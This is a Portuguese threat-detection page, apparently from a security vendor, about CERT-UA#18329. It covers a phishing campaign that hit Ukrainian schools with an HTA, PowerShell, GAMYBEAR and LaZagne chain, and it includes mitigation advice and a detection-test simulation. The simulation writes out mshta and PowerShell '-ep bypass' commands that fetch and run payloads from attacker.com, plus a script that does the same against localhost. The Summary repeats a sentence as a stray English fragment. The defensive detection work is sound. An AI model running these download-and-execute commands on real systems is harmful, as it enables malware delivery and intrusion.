Ciberataque direcionado a uma escola do leste da Ucrânia usando a ferramenta GAMYBEAR (CERT-UA#18329)
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha de coleta de credenciais atingiu escolas e agências públicas na região de Sumy via um e-mail de phishing contendo um anexo ZIP. A abertura do arquivo acionou um arquivo HTA através da utilidade mshta, que então puxou scripts PowerShell para implantar o backdoor GAMYBEAR e o despejador de credenciais LaZagne, estabelecer C2 baseado em HTTP e exfiltrar arquivos de diretórios alvo. utility, which then pulled down PowerShell scripts to deploy the GAMYBEAR backdoor and the LaZagne credential dumper, establish HTTP-based C2, and exfiltrate files from targeted directories.
Análise de Ataque
O CERT-UA vinculou a violação inicial a uma mensagem de phishing enviada em 26 de maio de 2025, a partir de uma conta Gmail sequestrada, fornecendo os detalhes da campanha no alerta CERT-UA#18329. A análise forense expôs uma cadeia de infecção em múltiplas etapas: ZIP → HTA → update.js → PowerShell → GAMYBEAR acompanhado pelo malware LaZagne, com persistência mantida por meio de uma entrada de registro Run e downloads recorrentes de URLs maliciosas.
Mitigação
Imponha a autenticação multifatorial para todas as contas de e-mail, bloqueie a execução de scripts HTA e PowerShell não confiáveis, bloqueie a chave de execução do registro e implemente a lista de permissões de aplicativos. Atualize continuamente as regras de detecção de endpoint para reconhecer os nomes de arquivos, hashes e indicadores de rede referenciados.
Resposta
Isole prontamente os endpoints impactados, redefina as credenciais do Gmail comprometidas, reúna todos os IOCs identificados e execute varreduras abrangentes para GAMYBEAR, LaZagne e artefatos associados. Informe o CERT-UA sobre o incidente e distribua os IOCs por meio de canais relevantes de compartilhamento de inteligência sobre ameaças.
Fluxo de Ataque
Detecções
Detecção de Comunicação C2 GAMYBEAR [Conexão de Rede do Windows]
Ver
Detecção de Execução do Backdoor GAMYBEAR [Evento de Arquivo do Windows]
Ver
Detecção de Execução de mshta.exe e PowerShell com Bypass [Criação de Processo do Windows]
Ver
IOCs (HashSha1) para detectar: Ciberataque contra uma instituição educacional no leste da Ucrânia usando a ferramenta GAMYBEAR (CERT-UA#18329)
Ver
IOCs (DestinationIP) para detectar: Ciberataque contra uma instituição educacional no leste da Ucrânia usando a ferramenta GAMYBEAR (CERT-UA#18329)
Ver
Simulações
Execução de Simulação
Pré-requisito: O Telemetry & Baseline Pre-flight Check deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque e Comandos:
-
Etapa 1 – Implantar HTA malicioso: O atacante hospeda
evil.htaem um servidor web comprometido. -
Etapa 2 – Executar via
mshta.exe: Usando um prompt de comando do Windows, o atacante executamshta.exe http://attacker.com/evil.hta. Isso cria um evento de criação de processo commshta.exena linha de comando, satisfazendo a primeira cláusula da regra. -
Etapa 3 – Bypass do PowerShell: Para executar um payload que contorna a Política de Execução do sistema, o atacante lança PowerShell com o
-ep bypassflag:PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"Isso gera um segundo evento de criação de processo contendo a string exata
PowerShell -ep bypass, satisfazendo a segunda cláusula.
-
-
Script de Teste de Regressão: O seguinte script PowerShell reproduz as etapas acima de forma automatizada e repetível.
# ------------------------------------------------- # Teste de Regressão – Desencadear Regra Sigma para mshta & PowerShell -ep bypass # ------------------------------------------------- # Variáveis – ajuste para o seu ambiente de laboratório $htaUrl = "http://127.0.0.1/evil.hta" # Deve apontar para um arquivo HTA acessível $psUrl = "http://127.0.0.1/payload.ps1" # Payload PS simples (por exemplo, `Write-Host "pwned"`) # 1. Invocar mshta.exe Write-Host "[*] Lançando mshta.exe contra $htaUrl" Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow # Pausa curta para garantir os logs do processo Start-Sleep -Seconds 2 # 2. Invocar PowerShell com bypass de política de execução $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1" Write-Host "[*] Lançando PowerShell -ep bypass" Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow # Pausa para permitir a geração de logs Start-Sleep -Seconds 5 Write-Host "[+] Teste concluído. Verifique seu SIEM por alertas." -
Comandos de Limpeza: Remova arquivos temporários e termine quaisquer processos de teste restantes.
# Limpeza de payload temporário Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue # Opcionalmente, mate instâncias de mshta ou PowerShell criadas pelo teste Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force